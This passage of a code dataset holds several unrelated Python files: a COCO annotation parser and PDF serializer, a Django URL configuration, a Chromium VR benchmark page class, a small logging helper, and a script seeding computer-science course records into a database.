default skips that filter.\n\n :param category_names: get cats for given cat names\n :param super_category_names: get cats for given super category names\n :param category_ids: get cats for given cat ids\n\n :return: ids: integer array of cat ids\n \"\"\"\n\n if category_names is None:\n category_names = []\n if super_category_names is None:\n super_category_names = []\n if category_ids is None:\n category_ids = []\n\n category_names = [category_names] if isinstance(category_names, str) else category_names\n super_category_names = [super_category_names] if isinstance(super_category_names, str) else super_category_names\n category_ids = [category_ids] if isinstance(category_ids, int) else category_ids\n\n if len(category_names) == len(super_category_names) == len(category_ids) == 0:\n cats = self.dataset[\"categories\"]\n else:\n cats = self.dataset[\"categories\"]\n cats = cats if len(category_names) == 0 else [cat for cat in cats if cat[\"name\"] in category_names]\n cats = (\n cats\n if len(super_category_names) == 0\n else [cat for cat in cats if cat[\"supercategory\"] in super_category_names]\n )\n cats = cats if len(category_ids) == 0 else [cat for cat in cats if cat[\"id\"] in category_ids]\n ids = [cat[\"id\"] for cat in cats]\n return ids\n\n def get_image_ids(\n self, img_ids: Optional[Union[int, Sequence[int]]] = None, cat_ids: Optional[Union[int, Sequence[int]]] = None\n ) -> Sequence[int]:\n \"\"\"\n Get img ids that satisfy given filter conditions.\n\n :param img_ids: get imgs for given ids\n :param cat_ids: get imgs with all given cats\n\n :return: ids: integer array of img ids\n \"\"\"\n\n if img_ids is None:\n img_ids = []\n if cat_ids is None:\n cat_ids = []\n\n img_ids = [img_ids] if isinstance(img_ids, int) else img_ids\n cat_ids = [cat_ids] if isinstance(cat_ids, int) else cat_ids\n\n if len(img_ids) == len(cat_ids) == 0:\n ids = set(self.imgs.keys())\n else:\n ids = set(img_ids)\n for i, cat_id in enumerate(cat_ids):\n if i == 0 and len(ids) == 0:\n ids = set(self.cat_to_imgs[cat_id])\n else:\n ids &= set(self.cat_to_imgs[cat_id])\n return list(ids)\n\n def load_anns(self, ids: Optional[Union[int, Sequence[int]]] = None) -> List[JsonDict]:\n \"\"\"\n Load anns with the specified ids.\n\n :param ids: integer ids specifying anns\n\n :return: anns: loaded ann objects\n \"\"\"\n if ids is None:\n ids = []\n ids = [ids] if isinstance(ids, int) else ids\n\n return [self.anns[id] for id in ids]\n\n def load_cats(self, ids: Optional[Union[int, Sequence[int]]] = None) -> List[JsonDict]:\n \"\"\"\n Load cats with the specified ids.\n\n :param ids: integer ids specifying cats\n\n :return: cats: loaded cat objects\n \"\"\"\n if ids is None:\n ids = []\n ids = [ids] if isinstance(ids, int) else ids\n\n return [self.cats[idx] for idx in ids]\n\n def load_imgs(self, ids: Optional[Union[int, Sequence[int]]] = None) -> List[JsonDict]:\n \"\"\"\n Load anns with the specified ids.\n\n :param ids: integer ids specifying img\n\n :return: imgs: loaded img objects\n \"\"\"\n if ids is None:\n ids = []\n ids = [ids] if isinstance(ids, int) else ids\n\n return [self.imgs[idx] for idx in ids]\n\n\nclass SerializerCoco:\n \"\"\"\n Class for serializing annotation files in Coco format. Coco comes in JSON format which is a priori not\n serialized. This class implements only the very basic methods to generate a dataflow. It wraps the coco class\n from pycocotools and assembles annotations that belong to the image. 
Note, that the conversion into the core\n `Image` has to be done by yourself.\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoints: Optional[int] = None) -> DataFlow:\n \"\"\"\n Loads a .json file and generates a dataflow.\n\n **Example:**\n\n {'images':[img1,img2,...], 'annotations':[ann1,ann2,...],...}\n\n it will generate a dataflow with datapoints\n\n\n {'image':{'id',...},'annotations':[{'id':…,'bbox':...}]}\n\n for each single image id.\n\n :param max_datapoints: Will stop the iteration once max_datapoints have been streamed.\n :param path: a path to a .json file.\n :return: dataflow to iterate from\n \"\"\"\n if not os.path.isfile(path):\n raise FileNotFoundError(path)\n file = os.path.split(path)[1]\n if not is_file_extension(file, \".json\"):\n raise FileExtensionError(f\"Expected .json file got {path}\")\n\n with timed_operation(\"Start loading .json file and serializing\"):\n coco = CocoParser(path)\n img_ids = coco.get_image_ids()\n imgs = coco.load_imgs(img_ids)\n\n with get_tqdm(total=len(imgs)) as status_bar:\n for img in imgs:\n img[\"annotations\"] = coco.img_to_anns[img[\"id\"]]\n status_bar.update()\n\n df = CustomDataFromList(imgs, max_datapoints=max_datapoints)\n return df\n\n @staticmethod\n def save() -> None:\n \"\"\"\n Not implemented\n \"\"\"\n raise NotImplementedError\n\n\nclass SerializerPdfDoc:\n \"\"\"\n Serialize a pdf document with an arbitrary number of pages.\n\n **Example:**\n\n df = SerializerPdfDoc.load(\"path/to/document.pdf\")\n\n will yield datapoints:\n\n {\"path\": \"path/to/document.pdf\", \"file_name\" document_page_1.pdf, \"pdf_bytes\": b\"some-bytes\"}\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoints: Optional[int] = None) -> DataFlow:\n \"\"\"\n Loads the document page wise and returns a dataflow accordingly.\n\n :param path: Path to the pdf document.\n :param max_datapoints: The maximum number of pages to stream.\n :return: A dict with structure {\"path\":... ,\"file_name\": ..., \"pdf_bytes\": ...}. 
The file name is a\n concatenation of the physical file name and the current page number.\n \"\"\"\n\n file_name = os.path.split(path)[1]\n prefix, suffix = os.path.splitext(file_name)\n df: DataFlow\n df = CustomDataFromIterable(PDFStreamer(path=path), max_datapoints=max_datapoints)\n df = MapData(\n df,\n lambda dp: {\n \"path\": path,\n \"file_name\": prefix + f\"_{dp[1]}\" + suffix,\n \"pdf_bytes\": dp[0],\n \"page_number\": dp[1],\n \"document_id\": get_uuid_from_str(prefix),\n },\n )\n return df\n\n @staticmethod\n def save(path: Pathlike) -> None:\n \"\"\"\n Not implemented\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def split(path: Pathlike, path_target: Optional[Pathlike] = None, max_datapoint: Optional[int] = None) -> None:\n \"\"\"\n Split a document into single pages.\n \"\"\"\n if path_target is None:\n path_target, _ = os.path.split(path)\n if not os.path.isdir(path_target):\n raise NotADirectoryError(path)\n df = SerializerPdfDoc.load(path, max_datapoint)\n for dp in df:\n with open(os.path.join(path_target, dp[\"file_name\"]), \"wb\") as page:\n page.write(dp[\"pdf_bytes\"])\n","repo_name":"deepdoctection/deepdoctection","sub_path":"deepdoctection/dataflow/custom_serialize.py","file_name":"custom_serialize.py","file_ext":"py","file_size_in_byte":19612,"program_lang":"python","lang":"en","doc_type":"code","stars":1814,"dataset":"github-code","pt":"52"} +{"seq_id":"14534474792","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom Legacy import settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'Legacy.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'content.views.index'),\n url(r'^articles/', include('content.urls')),\n\turl(r'^search/$', 'content.views.search'),\n \n)\n\nif settings.DEBUG is False: #if DEBUG is True it will be served automatically\n urlpatterns += patterns('',\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATICFILES_DIRS[0]}),\n )","repo_name":"JeremyMBell/Legacy","sub_path":"Legacy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12310525445","text":"import os\nfrom telemetry import page\nfrom contrib.vr_benchmarks import (shared_android_vr_page_state as\n vr_state)\n\nWEBVR_SAMPLE_DIR = os.path.join(\n os.path.dirname(__file__), '..', '..', '..', '..', 'chrome', 'test',\n 'data', 'vr', 'webvr_info', 'samples')\n\n\nWEBXR_SAMPLE_DIR = os.path.join(\n os.path.dirname(__file__), '..', '..', '..', '..', 'chrome', 'test',\n 'data', 'vr', 'webxr_samples')\n\n\nclass _VrXrSamplePage(page.Page):\n \"\"\"Superclass for all VR and XR sample pages.\"\"\"\n\n def __init__(self, sample_directory, sample_page, page_set,\n url_parameters=None, extra_browser_args=None):\n url = '%s.html' % sample_page\n if url_parameters is not None:\n url += '?' 
+ '&'.join(url_parameters)\n name = url.replace('.html', '')\n url = 'file://' + os.path.join(sample_directory, url)\n super(_VrXrSamplePage, self).__init__(\n url=url,\n page_set=page_set,\n name=name,\n extra_browser_args=extra_browser_args,\n shared_page_state_class=vr_state.SharedAndroidVrPageState)\n self._shared_page_state = None\n\n def Run(self, shared_state):\n self._shared_page_state = shared_state\n super(_VrXrSamplePage, self).Run(shared_state)\n\n @property\n def platform(self):\n return self._shared_page_state.platform\n\n\nclass VrSamplePage(_VrXrSamplePage):\n \"\"\"Superclass for all VR sample pages.\"\"\"\n\n def __init__(self, sample_page, page_set, url_parameters=None,\n extra_browser_args=None):\n super(VrSamplePage, self).__init__(\n sample_directory=WEBVR_SAMPLE_DIR,\n sample_page=sample_page,\n page_set=page_set,\n url_parameters=url_parameters,\n extra_browser_args=extra_browser_args)\n\n\nclass XrSamplePage(_VrXrSamplePage):\n \"\"\"Superclass for all XR sample pages.\"\"\"\n\n def __init__(self, sample_page, page_set, url_parameters=None,\n extra_browser_args=None):\n super(XrSamplePage, self).__init__(\n sample_directory=WEBXR_SAMPLE_DIR,\n sample_page=sample_page,\n page_set=page_set,\n url_parameters=url_parameters,\n extra_browser_args=extra_browser_args)\n\n @property\n def serving_dir(self):\n # The default implementation of serving_dir results in the WebXR pages not\n # loading properly since the JS resources are in webxr_samples/js/, and the\n # default implementation results in webxr_samples/tests/ being the serving\n # directory.\n return WEBXR_SAMPLE_DIR\n","repo_name":"kiwibrowser/src","sub_path":"tools/perf/contrib/vr_benchmarks/vr_sample_page.py","file_name":"vr_sample_page.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"41104393048","text":"import datetime\nimport sys\n\n\ndef write_log(message: dict):\n today = datetime.datetime.today().strftime('%d/%m/%Y')\n now = datetime.datetime.now().strftime('%H:%M:%S')\n with open('bot.log', 'a') as logfile:\n logfile.write(f'{message[\"text\"]:<25}{message[\"action\"]:<15}{now:<15}{today}\\n')\n logfile.close()\n\n\ndef read_log():\n with open('bot.log', 'r') as logfile:\n print(logfile.read())\n logfile.close()\n\n","repo_name":"fantunesdev/bot-topwar","sub_path":"game_functions/handle_log.py","file_name":"handle_log.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29357426577","text":"from app import db, models\nimport datetime\n\ncourses = []\n\ncourses.append(models.Course(course = 'CSC 1010',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Programming for All',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'A unified view of the powerful tools for '\n\t\t\t\t\t\t\t'manipulating text and the algorithms they implement; '\n\t\t\t\t\t\t\t'complexity and security of operations on text; locating '\n\t\t\t\t\t\t\t'and searching online text databases and bibliographies via '\n\t\t\t\t\t\t\t'the Internet; alternative text structures: hypertext, '\n\t\t\t\t\t\t\t'multimedia; alternative input techniques: scanning, voice.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1020',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing and the 
Web',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Information representation and manipulation; '\n\t\t\t\t\t\t\t'file systems and directories; compatibility and data '\n\t\t\t\t\t\t\t'exchange; security and privacy; elements of computer '\n\t\t\t\t\t\t\t'architectures and operating systems; computer networks, '\n\t\t\t\t\t\t\t'the Internet, and the World Wide Web; web site design '\n\t\t\t\t\t\t\t'principles and creation; PC based examples and illustrations.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1024',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing for Scientists',\n\t\t\t\t\t\t\tcredits = 1,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Active learning of computing skills necessary '\n\t\t\t\t\t\t\t'for scientists: datagraphing, regression analysis, animation, '\n\t\t\t\t\t\t\t'symbolic computing, information search techniques, scientific '\n\t\t\t\t\t\t\t'report writing, web page construction, fundamentals of programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1051',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms and Data Structures I',\n\t\t\t\t\t\t\tcredits = 4,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Algorithm design and programming fundamentals: data, '\n\t\t\t\t\t\t\t'variables, selection, loops, arrays, input/output; basic graphics '\n\t\t\t\t\t\t\t'and graphical user interfaces; object-oriented design: objects, '\n\t\t\t\t\t\t\t'classes, methods, encapsulation;',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1800',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Organization of Programming Languages',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'High level language features: data types, control '\n\t\t\t\t\t\t\t'structures; formal lexical and syntactical analysis; operational '\n\t\t\t\t\t\t\t'semantics; language translation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 2500',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Survey of Information Science',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Brief introductions to several areas in which '\n\t\t\t\t\t\t\t'problems in information use are important. 
Examples are business, '\n\t\t\t\t\t\t\t'law, biology, medicine, electronic commerce, and libraries.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 3400',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Retrieval',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Theory and practice of location, organization, '\n\t\t\t\t\t\t\t'and rendering of meaningful content from largely unorganized sources.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 4140',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Theory of Information',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Information and coding theory, data compression, cryptology.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 4181',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Compiler Construction',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Lexical and syntactical analysis; code generation; error '\n\t\t\t\t\t\t\t'recovery; recursive descent compilation; handling a run time environment.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1600 or CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4300',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Graphics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Hardware and software systems in computer graphics, graphics '\n\t\t\t\t\t\t\t'programming languages, (PHIGS, VRML), modeling in 3D, development of '\n\t\t\t\t\t\t\t'interactive software, animation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4380',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Visualization',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'The presentation of information; visual cognition, scientific '\n\t\t\t\t\t\t\t'visualization, illustration presentation, color theory, motion dynamics, '\n\t\t\t\t\t\t\t'image processing.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 4480',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Principles of Database Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Concepts and technology of database management systems and '\n\t\t\t\t\t\t\t'data modeling with an emphasis on the relational model; database querying '\n\t\t\t\t\t\t\t'and normalization; physical data organization.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 4500',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Artificial Intelligence',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'The nature of intelligence and the question of its computer '\n\t\t\t\t\t\t\t'implementation; search algorithms; knowledge representation; automated '\n\t\t\t\t\t\t\t'deduction; natural language understanding; planning; problem solving.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2053'))\n\ncourses.append(models.Course(course = 'CSC 4630',\n\t\t\t\t\t\t\tdepartment = 'Computing 
Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Development and Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Operating system structures; system calls; system libraries; '\n\t\t\t\t\t\t\t'interprocess communication; user-interface programming environments; '\n\t\t\t\t\t\t\t'software utilities; software portability.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2405 or CSC 1600'))\n\ncourses.append(models.Course(course = 'CSC 4730',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Human Computer Interaction',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Design of the user/system interface; measurement of human-computer '\n\t\t\t\t\t\t\t'interaction; models of the user and user communities; design criteria for the '\n\t\t\t\t\t\t\t'interface; user interface management systems (UIMS); test and evaluation '\n\t\t\t\t\t\t\t'strategies and tools.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and (MAT 2310 or MAT 4310)'))\n\ncourses.append(models.Course(course = 'CSC 4800',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Web Application Development',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Theory and design of web-based applications: stylesheets, applets, '\n\t\t\t\t\t\t\t'HTML, CGI programming, web server design, web site design, security, multimedia '\n\t\t\t\t\t\t\t'representations, encryption, compression.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 4900',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Networks',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Underlying principles of computer networks; OSI and TCP/IP '\n\t\t\t\t\t\t\t'architecture; LAN technologies; interconnecting devices: hubs, bridges, switches, '\n\t\t\t\t\t\t\t'routers, gateways; IP addressing and forwarding; routing protocols; transport '\n\t\t\t\t\t\t\t'protocols: error, flow, and congestion control; client-server communication; '\n\t\t\t\t\t\t\t'authentication and authorization; security threats and solutions.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400'))\n\ncourses.append(models.Course(course = 'CSC 5930',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Topics in Computer Science',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Lecture presentation of selected topics in computer science. '\n\t\t\t\t\t\t\t'May be repeated for credit if topics are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 3070',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Emerging Technology Trends',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Investigate new technologies and current applications. Explore '\n\t\t\t\t\t\t\t'when and how to apply new technologies with sensitivity to feasibility, '\n\t\t\t\t\t\t\t'financial viability, and overall effectiveness. 
Culminates in team-driven '\n\t\t\t\t\t\t\t'exploitation of a new technology.',\n\t\t\t\t\t\t\tprerequisites = 'Junior Standing'))\n\ncourses.append(models.Course(course = 'CSC 7000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms and Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Algorithm design and refinement; loop and selection control; '\n\t\t\t\t\t\t\t'recursion; arrays, pointers, records and strings; abstract data types: linked '\n\t\t\t\t\t\t\t'lists, stacks, queues, binary trees, elementary searching and sorting.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 7100',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Fundamental concepts in computer architecture and operating '\n\t\t\t\t\t\t\t'systems. Information representation, gates and digital logic, ALU and central '\n\t\t\t\t\t\t\t'processing organization, instruction sets, basics of pipelining, processes, '\n\t\t\t\t\t\t\t'memory management and file systems.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8301',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Design and Analysis of Algorithms',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Fundamental strategies for algorithm design; mathematical and '\n\t\t\t\t\t\t\t'empirical techniques for analysis of nonrecursive and recursive algorithms, '\n\t\t\t\t\t\t\t'with applications such as sorting, searching, string processing and graphs; '\n\t\t\t\t\t\t\t'NP-complete problems and approximation algorithms.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8310',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Linguistics of Programming Languages',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Organization, characteristics, constructs and design principles '\n\t\t\t\t\t\t\t'of programming languages; syntax, semantics, and pragmatics; language '\n\t\t\t\t\t\t\t'implementation issues; different programming paradigms such as imperative, '\n\t\t\t\t\t\t\t'functional, object-oriented, and logic programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8400',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Study of computing systems from the point of view of the '\n\t\t\t\t\t\t\t'programmer. Topics include information representation, processor '\n\t\t\t\t\t\t\t'architecture, computer performance, storage management, security and '\n\t\t\t\t\t\t\t'concurrent programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Foundations of Algorithms and Data Structures',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Programming in Java or another object-oriented language. '\n\t\t\t\t\t\t\t'Program design with an emphasis on the object paradigm. Classic algorithms '\n\t\t\t\t\t\t\t'and data structures. 
Significant programming assignments are required.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8410',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Operating Systems Concepts',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Principles and techniques required for creating and understanding '\n\t\t\t\t\t\t\t'operating systems, including the areas of: system services, concurrent programming, '\n\t\t\t\t\t\t\t'process and resource control; deadlock detection, recovery, and prevention; memory '\n\t\t\t\t\t\t\t'management; file systems; protection and security.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8400'))\n\ncourses.append(models.Course(course = 'CSC 8470',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Graphics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Interactive program development in 2D/3D graphics; event handling, '\n\t\t\t\t\t\t\t'real-time data sampling, and strategies in programming computer games; 2D/3D '\n\t\t\t\t\t\t\t'modeling; perspective viewing; object transformation; graphical user interface '\n\t\t\t\t\t\t\t'design.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301'))\n\ncourses.append(models.Course(course = 'CSC 8490',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Database Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Architecture of a database system; conceptual and implementation '\n\t\t\t\t\t\t\t'models; query languages, design theory; integrity, security, and concurrency; '\n\t\t\t\t\t\t\t'discussion of some commercial systems.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8510',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Theory of Computability',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Automata theory: deterministic and non-deterministic finite '\n\t\t\t\t\t\t\t'automata, pushdown automata, regular languages, context-free grammars, '\n\t\t\t\t\t\t\t'pumping lemma. Computability and recursion theory; Turing machines and '\n\t\t\t\t\t\t\t'their variations, decidability and recursive enumerability, mapping '\n\t\t\t\t\t\t\t'reducibility and Turing reducibility, undecidability of the halting problem, '\n\t\t\t\t\t\t\t'logical theories and Godel\\'s incompleteness theorem. 
Complexity theory: time '\n\t\t\t\t\t\t\t'complexity, space complexity, major open problems on computational complexity.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8530',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Distributed Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'An introduction to distributed systems; distributed system '\n\t\t\t\t\t\t\t'architecture and design goals; networks and distributed protocols; '\n\t\t\t\t\t\t\t'distributed/network operating systems, including distributed resource '\n\t\t\t\t\t\t\t'control and management, concurrency and interprocess communication; remote '\n\t\t\t\t\t\t\t'procedure calling; client/server techniques and issues; reliability of '\n\t\t\t\t\t\t\t'distributed systems; security and authentication.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8540',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'An introduction to software engineering covering development '\n\t\t\t\t\t\t\t'life-cycle models, requirements analysis and specification, design concepts '\n\t\t\t\t\t\t\t'and methods, testing, maintenance, CASE tools and management concerns. '\n\t\t\t\t\t\t\t'Additional topics may include reuse, metrics, experimentation, reengineering, '\n\t\t\t\t\t\t\t'development environments, and standards. The student may be required to write '\n\t\t\t\t\t\t\t'a research paper and/or give an in-class presentation.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8560',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Networks',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Computer networks as an application development platform; '\n\t\t\t\t\t\t\t'services required by and provided to distributed applications; electronic 